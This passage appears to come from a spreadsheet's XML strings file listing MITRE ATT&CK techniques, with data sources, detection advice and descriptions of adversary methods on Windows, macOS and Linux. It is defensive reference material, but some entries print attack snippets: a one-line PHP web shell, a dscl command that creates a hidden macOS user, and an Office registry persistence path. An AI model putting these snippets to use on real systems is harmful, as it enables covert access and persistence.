Example commands that can acquire this information are &lt;code&gt;net user&lt;/code&gt;, &lt;code&gt;net group &lt;groupname&gt;&lt;/code&gt;, and &lt;code&gt;net localgroup &lt;groupname&gt;&lt;/code&gt; using the [Net](https://attack.mitre.org/software/S0039) utility or through use of [dsquery](https://attack.mitre.org/software/S0105). If adversaries attempt to identify the primary user, currently logged in user, or set of users that commonly uses a system, [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) may apply.
### Mac
On Mac, groups can be enumerated through the &lt;code&gt;groups&lt;/code&gt; and &lt;code&gt;id&lt;/code&gt; commands. In mac specifically, &lt;code&gt;dscl . list /Groups&lt;/code&gt; and &lt;code&gt;dscacheutil -q group&lt;/code&gt; can also be used to enumerate groups and users.
###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t>
  </si>
  <si>
    <t>Bypass User Account Control</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</si>
  <si>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</si>
  <si>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Hijacking](https://attack.mitre.org/techniques/T1038),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 (Citation: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 (Citation: enigma0x3 sdclt app paths) (Citation: enigma0x3 sdclt bypass)
Analysts should monitor these Registry settings for unauthorized changes.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</si>
  <si>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are allowed to elevate privileges or execute some elevated COM objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: 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 (Citation: Davidson Windows) Adversaries can use these techniques to elevate privileges to administrator if the target process is unprotected.
Many methods have been discovered to bypass UAC. The Github readme page for UACMe contains an extensive list of methods (Citation: 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 (Citation: enigma0x3 Fileless UAC Bypass) (Citation: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 (Citation: SANS UAC Bypass)</t>
  </si>
  <si>
    <t>Disabling Security Tools</t>
  </si>
  <si>
    <t>API monitoring,File monitoring,Services,Windows Registry,Process command-line parameters,Anti-virus</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments to see if security tools are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Lack of log or event file reporting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</si>
  <si>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</si>
  <si>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Connection Proxy</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</si>
  <si>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</si>
  <si>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</si>
  <si>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 connection proxy is used to direct network traffic between systems or act as an intermediary for network communications. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: 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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Process Hollowing</t>
  </si>
  <si>
    <t>Process monitoring,API monitoring</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</si>
  <si>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 (Citation: Endgame Process Injection July 2017)
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.</t>
  </si>
  <si>
    <t>Process hollowing occurs when a process is created in a suspended state then its memory is unmapped and replaced with malicious code. Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), execution of the malicious code is masked under a legitimate process and may evade defenses and detection analysis. (Citation: Leitch Hollowing) (Citation: Endgame Process Injection July 2017)</t>
  </si>
  <si>
    <t>Custom Command and Control Protocol</t>
  </si>
  <si>
    <t>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring,Host network interface,Network intrusion detection system,Network protocol analysis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</si>
  <si>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Monitor and investigate API calls to functions associated with enabling and/or utilizing alternative communication channels.</t>
  </si>
  <si>
    <t>Adversaries may communicate using a custom command and control protocol instead of encapsulating commands/data in an existing [Standard Application Layer Protocol](https://attack.mitre.org/techniques/T1071). Implementations include mimicking well-known protocols or developing custom protocols (including raw sockets) on top of fundamental protocols provided by TCP/IP/another standard network stack.</t>
  </si>
  <si>
    <t>Standard Non-Application Layer Protocol</t>
  </si>
  <si>
    <t>Host network interface,Netflow/Enclave netflow,Network intrusion detection system,Network protocol analysis,Packet capture,Process use of network</t>
  </si>
  <si>
    <t>Use of a standard non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive. (Citation: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</si>
  <si>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NTFS File Attributes</t>
  </si>
  <si>
    <t>File monitoring,Kernel drivers,API monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Forensic techniques exist to identify information stored in NTFS EA. (Citation: Journey into IR ZeroAccess NTFS EA) Monitor calls to the ZwSetEaFile and ZwQueryEaFile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</si>
  <si>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</si>
  <si>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</si>
  <si>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 (Citation: CERT-EU Golden Ticket Protection)</t>
  </si>
  <si>
    <t>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(Citation: ADSecurity AD Kerberos Attacks) (Citation: GentilKiwi Pass the Ticket)
Silver Tickets can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint). (Citation: ADSecurity AD Kerberos Attacks)
Golden Tickets can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory. (Citation: Campbell 2014)</t>
  </si>
  <si>
    <t>Account Manipulation</t>
  </si>
  <si>
    <t>Authentication logs,API monitoring,Windows event logs,Packet capture</t>
  </si>
  <si>
    <t>Collect events that correlate with changes to account objects on systems and the domain, such as event ID 4738. (Citation: Microsoft User Modified Event) Monitor for modification of accounts in correlation with other suspicious activity. Changes may occur at unusual times or from unusual systems. Especially flag events where the subject and target accounts differ (Citation: InsiderThreat ChangeNTLM July 2017) or that include additional flags such as changing a password without knowledge of the old password. (Citation: GitHub Mimikatz Issue 92 June 2017)
Use of credentials may also occur at unusual times or to unusual systems or services and may correlate with other suspicious activity.</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</si>
  <si>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</si>
  <si>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credential-access,persistence</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</si>
  <si>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</si>
  <si>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</si>
  <si>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 (Citation: WindowsIR Anti-Forensic Techniques)</t>
  </si>
  <si>
    <t>Web Shell</t>
  </si>
  <si>
    <t>Anti-virus,Authentication logs,File monitoring,Netflow/Enclave netflow,Process monitoring</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</si>
  <si>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&lt;code&gt;&lt;?php @eval($_POST['password']);&gt;&lt;/code&gt;
Nevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as running [cmd](https://attack.mitre.org/software/S0106)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</si>
  <si>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(Citation: Lee 2013)
Web shells may serve as [Redundant Access](https://attack.mitre.org/techniques/T1108) or as a persistence mechanism in case an adversary's primary access methods are detected and removed.</t>
  </si>
  <si>
    <t>Security Support Provider</t>
  </si>
  <si>
    <t>DLL monitoring,Windows Registry,Loaded DLLs</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</si>
  <si>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</si>
  <si>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(Citation: Graeber 2014)</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</si>
  <si>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</si>
  <si>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</si>
  <si>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 (Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>Adversaries may use an existing, legitimate external Web service as a means for relaying commands to a compromised system.
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</si>
  <si>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command-and-control,defense-evasion</t>
  </si>
  <si>
    <t>AppInit DLLs</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Injection](https://attack.mitre.org/techniques/T1055), these values can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. (Citation: AppInit Registry)
The AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled. (Citation: AppInit Secure Boot)</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Remote File Copy</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</si>
  <si>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</si>
  <si>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</si>
  <si>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[FTP](https://attack.mitre.org/software/S0095).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Shares](https://attack.mitre.org/techniques/T1077) or [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1076).</t>
  </si>
  <si>
    <t>command-and-control,lateral-movement</t>
  </si>
  <si>
    <t>Execution through API</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Adversary tools may directly use the Windows application programming interface (API) to execute binaries. Functions such as the Windows API CreateProcess will allow programs and scripts to start other processes with proper path and argument parameters. (Citation: Microsoft CreateProcess)
Additional Windows API calls that can be used to execute binaries include: (Citation: Kanthak Verifier)
* CreateProcessA() and CreateProcessW(),
* CreateProcessAsUserA() and CreateProcessAsUserW(),
* CreateProcessInternalA() and CreateProcessInternalW(),
* CreateProcessWithLogonW(), CreateProcessWithTokenW(),
* LoadLibraryA() and LoadLibraryW(),
* LoadLibraryExA() and LoadLibraryExW(),
* LoadModule(),
* LoadPackagedLibrary(),
* WinExec(),
* ShellExecuteA() and ShellExecuteW(),
* ShellExecuteExA() and ShellExecuteExW()</t>
  </si>
  <si>
    <t>File Deletion</t>
  </si>
  <si>
    <t>File monitoring,Process command-line parameters,Binary file metadata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</si>
  <si>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</si>
  <si>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</si>
  <si>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Redundant Access</t>
  </si>
  <si>
    <t>Process monitoring,Process use of network,Packet capture,Network protocol analysis,File monitoring,Authentication logs,Binary file metadata</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</si>
  <si>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</si>
  <si>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 (Citation: Mandiant APT1)
Use of a [Web Shell](https://attack.mitre.org/techniques/T1100) is one such way to maintain access to a network through an externally accessible Web server.</t>
  </si>
  <si>
    <t>defense-evasion,persistence</t>
  </si>
  <si>
    <t>Component Firmware</t>
  </si>
  <si>
    <t>Disk forensics,API monitoring,Process monitoring,Component firmware</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</si>
  <si>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</si>
  <si>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Firmware](https://attack.mitre.org/techniques/T1019)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</si>
  <si>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Brute Force</t>
  </si>
  <si>
    <t>It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network. 
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For password spraying consider the following(Citation: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</si>
  <si>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Adversaries may use brute force techniques to attempt access to accounts when passwords are unknown or when password hashes are obtained.
[Credential Dumping](https://attack.mitre.org/techniques/T1003) is used to obtain password hashes, this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1075) is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network. (Citation: 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 (Citation: Cylance Cleaver)
A related technique called password spraying uses one password (e.g. 'Password01'),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default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows "logon failure" event ID 4625.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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(see examples).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establish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[Windows Admin Shares](https://attack.mitre.org/techniques/T1077)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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations.
### Mac
On OSX, the native command &lt;code&gt;screencapture&lt;/code&gt; is used to capture screenshots.
### Linux
On Linux, there is the native command &lt;code&gt;xwd&lt;/code&gt;. (Citation: Antiquated Mac Malware)</t>
  </si>
  <si>
    <t>Email Collection</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Clipboard Data</t>
  </si>
  <si>
    <t>Access to the clipboard is a legitimate function of many applications on a Windows system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity.</t>
  </si>
  <si>
    <t>Adversaries may collect data stored in the Windows clipboard from users copying information within or between applications. 
### Windows
Applications can access clipboard data by using the Windows API. (Citation: MSDN Clipboard) 
### Mac
OSX provides a native command, &lt;code&gt;pbpaste&lt;/code&gt;, to grab clipboard contents  (Citation: Operating with EmPyre).</t>
  </si>
  <si>
    <t>Code Signing</t>
  </si>
  <si>
    <t>Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers.</t>
  </si>
  <si>
    <t>Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) However, adversaries are known to use code signing certificates to masquerade malware and tools as legitimate binaries (Citation: Janicab). The certificates used during an operation may be created, forged, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates)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t>
  </si>
  <si>
    <t>Regsvr32</t>
  </si>
  <si>
    <t>Loaded DLLs,Process monitoring,Windows Registry,Process command-line parameters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</si>
  <si>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</si>
  <si>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Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe can be used to execute arbitrary binaries. (Citation: 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SubTee Regsvr32 Whitelisting Bypass)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Hijacking](https://attack.mitre.org/techniques/T1122). (Citation: Carbon Black Squiblydoo Apr 2016)</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</si>
  <si>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</si>
  <si>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</si>
  <si>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InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: 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 (Citation: SubTee GitHub All The Things Application Whitelisting Bypass)</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</si>
  <si>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</si>
  <si>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</si>
  <si>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[PowerShell](https://attack.mitre.org/techniques/T1086).</t>
  </si>
  <si>
    <t>Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of [Scripting](https://attack.mitre.org/techniques/T1064)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[Remote File Copy](https://attack.mitre.org/techniques/T1105) to identify and move files.</t>
  </si>
  <si>
    <t>Peripheral Device Discovery</t>
  </si>
  <si>
    <t/>
  </si>
  <si>
    <t>Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies. Both are digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: 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SubTee GitHub All The Things Application Whitelisting Bypass)</t>
  </si>
  <si>
    <t>Component Object Model Hijacking</t>
  </si>
  <si>
    <t>Windows Registry,DLL monitoring,Loaded DLLs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</si>
  <si>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 (Citation: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</si>
  <si>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The Component Object Model (COM) is a system within Windows to enable interaction between software components through the operating system. (Citation: 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(Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. (Citation: MSDN System Time) (Citation: Technet Windows Time Service)
An adversary may gather the system time and/or time zone from a local or remote system. This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Task](https://attack.mitre.org/techniques/T1053) (Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting.</t>
  </si>
  <si>
    <t>T1125</t>
  </si>
  <si>
    <t>Video Capture</t>
  </si>
  <si>
    <t>Process monitoring,File monitoring,API monitoring</t>
  </si>
  <si>
    <t>Windows,macOS</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Network Share Connection Removal</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.</t>
  </si>
  <si>
    <t>Trusted Developer Utilities</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</si>
  <si>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</si>
  <si>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 MSBuild
MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It takes XML formatted project files that define requirements for building various platforms and configurations. (Citation: MSDN MSBuild) 
Adversaries can use MSBuild to proxy execution of code through a trusted Windows utility. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# code to be inserted into the XML project file. (Citation: MSDN MSBuild) Inline Tasks MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application whitelisting defenses that are configured to allow MSBuild.exe execution. (Citation: SubTee GitHub All The Things Application Whitelisting Bypass)
### DNX
The .NET Execution Environment (DNX), dnx.exe, is a software development kit packaged with Visual Studio Enterprise. It was retired in favor of .NET Core CLI in 2016. (Citation: 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 (Citation: engima0x3 DNX Bypass)
### RCSI
The rcsi.exe utility is a non-interactive command-line interface for C# that is similar to csi.exe. It was provided within an early version of the Roslyn .NET Compiler Platform but has since been deprecated for an integrated solution. (Citation: Microsoft Roslyn CPT RCSI) The rcsi.exe binary is signed by Microsoft. (Citation: engima0x3 RCSI Bypass)
C# .csx script files can be written and executed with rcsi.exe at the command-line. An adversary can use rcsi.exe to proxy execution of arbitrary code to bypass application whitelisting policies that do not account for execution of rcsi.exe. (Citation: engima0x3 RCSI Bypass)
### WinDbg/CDB
WinDbg is a Microsoft Windows kernel and user-mode debugging utility. The Microsoft Console Debugger (CDB) cdb.exe is also user-mode debugger. Both utilities are included in Windows software development kits and can be used as standalone tools. (Citation: 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 (Citation: Exploit Monday WinDbg)
It is likely possible to use other debuggers for similar purposes, such as the kernel-mode debugger kd.exe, which is also signed by Microsoft.
### Tracker
The file tracker utility, tracker.exe, is included with the .NET framework as part of MSBuild. It is used for logging calls to the Windows file system. (Citation: Microsoft Docs File Tracking)
An adversary can use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions. (Citation: Twitter SubTee Tracker.exe)</t>
  </si>
  <si>
    <t>Netsh Helper DLL</t>
  </si>
  <si>
    <t>DLL monitoring,Windows Registry,Process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</si>
  <si>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</si>
  <si>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(Citation: Demaske Netsh Persistence)
Proof of concept code exists to load Cobalt Strike's payload using netsh.exe helper DLLs. (Citation: Github Netsh Helper CS Beacon)</t>
  </si>
  <si>
    <t>Execution through Module Load</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</si>
  <si>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</si>
  <si>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</si>
  <si>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can use this functionality as a way to execute arbitrary code on a system.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Authentication Package</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Management](https://attack.mitre.org/techniques/T1028) can also be used externally.
Adversaries may use remote services to initially access and/or persist within a network. (Citation: Volexity Virtual Private Keylogging) Access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network. Access to remote services may be used as part of [Redundant Access](https://attack.mitre.org/techniques/T1108) during an operation.</t>
  </si>
  <si>
    <t>persistence,initial-access</t>
  </si>
  <si>
    <t>Access Token Manipulation</t>
  </si>
  <si>
    <t>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</si>
  <si>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 (Citation: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 (Citation: Microsoft DuplicateTokenEx), and &lt;code&gt;ImpersonateLoggedOnUser&lt;/code&gt; (Citation: Microsoft ImpersonateLoggedOnUser)). Please see the referenced Windows API pages for more information.
Query systems for process and thread token information and look for inconsistencies such as user owns processes impersonating the local SYSTEM account. (Citation: BlackHat Atkinson Winchester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</si>
  <si>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(Citation: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 (Citation: Pentestlab Token Manipulation)
Access tokens can be leveraged by adversaries through three methods: (Citation: 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(Citation: Metasploit access token)  The Cobalt Strike beacon payload allows arbitrary token impersonation and can also create tokens. (Citation: Cobalt Strike Access Token)</t>
  </si>
  <si>
    <t>Network Share Discovery</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters,Network protocol analysis,Process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</si>
  <si>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[PowerShell](https://attack.mitre.org/techniques/T1086).</t>
  </si>
  <si>
    <t>Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. 
### Windows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 Mac
On Mac, locally mounted shares can be viewed with the &lt;code&gt;df -aH&lt;/code&gt; command.</t>
  </si>
  <si>
    <t>Create Account</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters,Authentication logs,Windows event logs</t>
  </si>
  <si>
    <t>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</si>
  <si>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</si>
  <si>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Office Application Startup</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</si>
  <si>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</si>
  <si>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 (Citation: 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For the Outlook rules and forms methods,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</si>
  <si>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Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started.
### Office Template Macros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 (Citation: enigma0x3 normal.dotm) (Citation: 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 Office Test
A Registry location was found that when a DLL reference was placed within it the corresponding DLL pointed to by the binary path would be executed every time an Office application is started (Citation: Hexacorn Office Test)
&lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf&lt;/code&gt;
### Add-ins
Office add-ins can be used to add functionality to Office programs. (Citation: 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 Outlook Rules, Forms, and Home Page
A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub)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To abuse these features, an adversary requires prior access to the user’s Outlook mailbox, either via an Exchange/OWA server or via the client application. Once malicious rules, forms, or Home Pages have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded while malicious rules and forms will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)(Citation: SensePost Outlook Forms)(Citation: SensePost Outlook Home Page)</t>
  </si>
  <si>
    <t>Application Shimming</t>
  </si>
  <si>
    <t>Loaded DLLs,System calls,Windows Registry,Process monitoring,Process command-line parameters</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</si>
  <si>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</si>
  <si>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[Hooking](https://attack.mitre.org/techniques/T1179)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Control](https://attack.mitre.org/techniques/T1088) (UAC) (RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress). Similar to [Hooking](https://attack.mitre.org/techniques/T1179), utilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc.</t>
  </si>
  <si>
    <t>Bash History</t>
  </si>
  <si>
    <t>Linux,macOS</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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[Scripting](https://attack.mitre.org/techniques/T1064), [PowerShell](https://attack.mitre.org/techniques/T1086),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Payloads may be compressed, archived, or encrypted in order to avoid detection.  These payloads may be used with [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) during Initial Access or later to mitigate detection.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t>
  </si>
  <si>
    <t>Input Prompt</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters,User interface,PowerShell logs</t>
  </si>
  <si>
    <t>Monitor process execution for unusual programs as well as malicious instances of [Scripting](https://attack.mitre.org/techniques/T1064) that could be used to prompt users for credentials.
Inspect and scrutinize input prompts for indicators of illegitimacy, such as non-traditional banners, text, timing, and/or sources.</t>
  </si>
  <si>
    <t>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Control](https://attack.mitre.org/techniques/T1088)).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[AppleScript](https://attack.mitre.org/techniques/T1155)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware) and [PowerShell](https://attack.mitre.org/techniques/T1086)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015).</t>
  </si>
  <si>
    <t>Keychain</t>
  </si>
  <si>
    <t>System calls,Process monitoring</t>
  </si>
  <si>
    <t>macOS</t>
  </si>
  <si>
    <t>Unlocking the keychain and using passwords from it is a very common process, so there is likely to be a lot of noise in any detection technique. Monitoring of system calls to the keychain can help determine if there is a suspicious process trying to access it.</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</si>
  <si>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</si>
  <si>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Hidden Window</t>
  </si>
  <si>
    <t>Plist files are ASCII text files with a specific format, so they're relatively easy to parse. File monitoring can check for the &lt;code&gt;apple.awt.UIElement&lt;/code&gt; or any other suspicious plist tag in plist files and flag them.</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</si>
  <si>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(Citation: Antiquated Mac Malware).</t>
  </si>
  <si>
    <t>Gatekeeper Bypass</t>
  </si>
  <si>
    <t>Monitoring for the removal of the &lt;code&gt;com.apple.quarantine&lt;/code&gt; flag by a user instead of the operating system is a suspicious action and should be examined further.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures. (Citation: Wikipedia Public Key Crypto)
Adversaries may gather private keys from compromised systems for use in authenticating to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email. Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc. Adversaries may also look in common key directories, such as &lt;code&gt;~/.ssh&lt;/code&gt; for SSH keys on * nix-based systems or &lt;code&gt;C:\Users\(username)\.ssh\&lt;/code&gt; on Windows.
Private keys should require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line.
Adversary tools have been discovered that search compromised systems for file extensions relating to cryptographic keys and certificates. (Citation: Kaspersky Careto) (Citation: Palo Alto Prince of Persia)</t>
  </si>
  <si>
    <t>Clear Command History</t>
  </si>
  <si>
    <t>Authentication logs,File monitoring</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Hidden Users</t>
  </si>
  <si>
    <t>This technique prevents the new user from showing up at the log in screen, but all of the other signs of a new user still exist. The user still gets a home directory and will appear in the authentication logs.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</si>
  <si>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[Create Account](https://attack.mitre.org/techniques/T1136) technique with a userID under 500 and enabling this property (setting it to Yes), an adversary can hide their user accounts much more easily: &lt;code&gt;sudo dscl . -create /Users/username UniqueID 401&lt;/code&gt; (Citation: Cybereason OSX Pirrit).</t>
  </si>
  <si>
    <t>HISTCONTROL</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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 (Citation: Sofacy Komplex Trojan)</t>
  </si>
  <si>
    <t>defense-evasion,persistence,privilege-escalation</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Launchctl</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</si>
  <si>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</si>
  <si>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(Citation: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</si>
  <si>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defense-evasion,execution,persistence</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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execution,persistence</t>
  </si>
  <si>
    <t>AppleScript</t>
  </si>
  <si>
    <t>API monitoring,System calls,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Monitor for execution of AppleScript through osascript that may be related to other suspicious behavior occurring on the system.</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</si>
  <si>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(Citation: Macro Malware Targets Macs). Scripts can be run from the command-line via &lt;code&gt;osascript /path/to/script&lt;/code&gt; or &lt;code&gt;osascript -e "script here"&lt;/code&gt;.</t>
  </si>
  <si>
    <t>.bash_profile and .bashrc</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</si>
  <si>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</si>
  <si>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</si>
  <si>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  (Citation: amnesia malware).</t>
  </si>
  <si>
    <t>Dylib Hijacking</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Hidden Files and Directories</t>
  </si>
  <si>
    <t>Monitor the file system and shell commands for files being created with a leading "." and the Windows command-line use of attrib.exe to add the hidden attribute.</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</si>
  <si>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Adversaries can use this to their advantage to hide files and folders anywhere on the system for persistence and evading a typical user or system analysis that does not incorporate investigation of hidden files.
###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 Linux/Mac
Users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name  (Citation: Sofacy Komplex Trojan) (Citation: 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 Mac
Files on macOS can be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker).
Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Launch Daemon</t>
  </si>
  <si>
    <t>Process monitoring,File monitoring</t>
  </si>
  <si>
    <t>Monitor Launch Daemon creation through additional plist files and utilities such as Objective-See's Knock Knock application.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</si>
  <si>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</si>
  <si>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LC_LOAD_DYLIB Addition</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</si>
  <si>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</si>
  <si>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</si>
  <si>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(Citation: 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(Citation: Malware Persistence on OS X).</t>
  </si>
  <si>
    <t>Login Item</t>
  </si>
  <si>
    <t>File monitoring,API monitoring</t>
  </si>
  <si>
    <t>All the login items created via shared file lists are viewable by going to the Apple menu -&gt; System Preferences -&gt; Users &amp; Groups -&gt; Login items. This area (and the corresponding file locations) should be monitored and whitelisted for known good applications. Otherwise, Login Items are located in &lt;code&gt; Contents/Library/LoginItems &lt;/code&gt; within an application bundle, so these paths should be monitored as well  (Citation: Adding Login Items). Monitor process execution resulting from login actions for unusual or unknown applications.</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</si>
  <si>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(Citation: Adding Login Items). Users have direct control over login items installed using a shared file list which are also visible in System Preferences (Citation: Adding Login Items). These login items are stored in the user's &lt;code&gt;~/Library/Preferences/&lt;/code&gt; directory in a plist file called &lt;code&gt;com.apple.loginitems.plist&lt;/code&gt; (Citation: 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 &lt;/code&gt; can be used to set Login Items, but scripting languages like [AppleScript](https://attack.mitre.org/techniques/T1155) can do this as well  (Citation: Adding Login Items).</t>
  </si>
  <si>
    <t>Rc.common</t>
  </si>
  <si>
    <t>The &lt;code&gt;/etc/rc.common&lt;/code&gt; file can be monitored to detect changes from the company policy. Monitor process execution resulting from the rc.common script for unusual or unknown applications or behavior.</t>
  </si>
  <si>
    <t>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technique in favor of launch agents and launch daemons, but is currently still used.
Adversaries can use the rc.common file as a way to hide code for persistence that will execute on each reboot as the root user (Citation: Methods of Mac Malware Persistence).</t>
  </si>
  <si>
    <t>Re-opened Applications</t>
  </si>
  <si>
    <t>Monitoring the specific plist files associated with reopening applications can indicate when an application has registered itself to be reopened.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Per Apple’s documentation,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root. If an adversary is able to modify an existing Startup Item, then they will be able to Privilege Escalate as well.</t>
  </si>
  <si>
    <t>Setuid and Setgid</t>
  </si>
  <si>
    <t>Monitor the file system for files that have the setuid or setgid bits set. Monitor for execution of utilities, like chmod, and their command-line arguments to look for setuid or setguid bits being set.</t>
  </si>
  <si>
    <t>When the setuid or setgid bits are set on Linux or macOS for an application, this means that the application will run with the privileges of the owning user or group respectively  (Citation: setuid man page).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 Additionally, adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future  (Citation: OSX Keydnap malware).</t>
  </si>
  <si>
    <t>privilege-escalation,persistence</t>
  </si>
  <si>
    <t>Securityd Memory</t>
  </si>
  <si>
    <t>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 (Citation: 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 (Citation: OS X Keychain) (Citation: OSX Keydnap malware)</t>
  </si>
  <si>
    <t>Local Job Scheduling</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</si>
  <si>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t>
  </si>
  <si>
    <t>On Linux and macOS systems, multiple methods are supported for creating pre-scheduled and periodic background jobs: cron, (Citation: Die.net Linux crontab Man Page) at, (Citation: Die.net Linux at Man Page) and launchd. (Citation: AppleDocs Scheduling Timed Jobs) Unlike [Scheduled Task](https://attack.mitre.org/techniques/T1053) on Windows systems, job scheduling on Linux-based systems cannot be done remotely unless used in conjunction within an established remote session, like secure shell (SSH).
### cron
